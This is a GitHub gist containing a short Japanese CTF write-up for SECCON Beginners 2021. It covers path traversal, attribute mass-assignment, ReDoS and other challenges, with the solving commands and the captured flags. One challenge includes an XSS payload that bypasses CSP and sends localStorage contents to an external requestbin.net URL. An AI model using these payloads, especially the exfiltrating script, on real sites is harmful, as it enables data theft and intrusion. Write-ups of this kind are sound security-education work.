Skip to content

Instantly share code, notes, and snippets.

@shiv3

shiv3/gist:0f7d66e5eabb303d35387a16aa4f5db6

Last active May 24, 2021 05:23
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save shiv3/0f7d66e5eabb303d35387a16aa4f5db6 to your computer and use it in GitHub Desktop.
Save shiv3/0f7d66e5eabb303d35387a16aa4f5db6 to your computer and use it in GitHub Desktop.
Download ZIP
ctf4b 2021 writeup
Raw
gistfile1.md

ctf4b 2021

ちょっと参加してました

osoba

path指定するだけ

$ curl "https://osoba.quals.beginners.seccon.jp/?page=/flag"
ctf4b{omisoshiru_oishi_keredomo_tsukuruno_taihen

Werewolf

pythonの__dictを直でいじっているので__roleも投げれば付きそうだった。

>>> class Player:
...     def __init__(self):
...         self.name = None
...         self.color = None
...         self.__role = random.choice(['VILLAGER', 'FORTUNE_TELLER', 'PSYCHIC', 'KNIGHT', 'MADMAN'])
>>> import random
>>> player = Player()
>>> player
<__main__.Player instance at 0x107fd8950>
>>> player.__dict__
{'color': None, 'name': None, '_Player__role': 'FORTUNE_TELLER'}
>>>

実際に実行してみると__dict__上では _Player__role というkeyで入っているっぽいのでそれで投げる

$ curl 'https://werewolf.quals.beginners.seccon.jp/' -X POST -d "_Player__role=WEREWOLF"

...
<p id="flag">ctf4b{there_are_so_many_hackers_among_us}</p>

magic

CSPが下のような感じ

Content-Security-Policy: 
style-src 'self' ; 
script-src 'self' ; 
object-src 'none' ; 
font-src 'none'

こうなるとjsファイルを上げるかjsをそのまま出力してくれるところを探すしかなさそう。

コードを読むとtokenのエラー出力箇所で

function escapeHTML(string) {
  return string
    .replace(/\&/g, "&amp;")
    .replace(/\</g, "&lt;")
    .replace(/\>/g, "&gt;")
    .replace(/\"/g, "&quot;")
    .replace(/\'/g, "&#x27");
}

というエスケープ箇所を発見したので、そこでjsのコードを出力させてscriptタグで読み込ませる。

Submit押させるだけで良いのに無駄に外部に飛ばすやつを書いてしまった。

<script src="https://magic.quals.beginners.seccon.jp/magic?token=v=document.createElement(`img`);%20m=localStorage.getItem(%27memo%27);%20v.setAttribute(`src`,`http://requestbin.net/r/7c30tqu0?${m}`%20);%20document.body.appendChild(v);//"></script>

only_read

Hopperでちまちま

children

pidを答えてったらフラグが出るっぽいなと思って実行してたら出た

$ ./children
I will generate 10 child processes.
They also might generate additional child process.
Please tell me each process id in order to identify them!
Please give me my child pid!
353
ok
...
Please give me my child pid!
364
ok
How many children were born?
13
ctf4b{p0werfu1_tr4sing_t0015_15_usefu1}

Mail_Address_Validator

多分ReDos的な問題っぽかった

https://blog.ohgaki.net/redos-must-review-mail-address-validation

1000文字のメアド送るだけでフラグが出た

$ python -c "print 'A'*1000+'@.com'" | nc mail-address-validator.quals.beginners.seccon.jp 5100

I check your mail address.
please puts your mail address.
ctf4b{1t_15_n0t_0nly_th3_W3b_th4t_15_4ff3ct3d_by_ReDoS}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment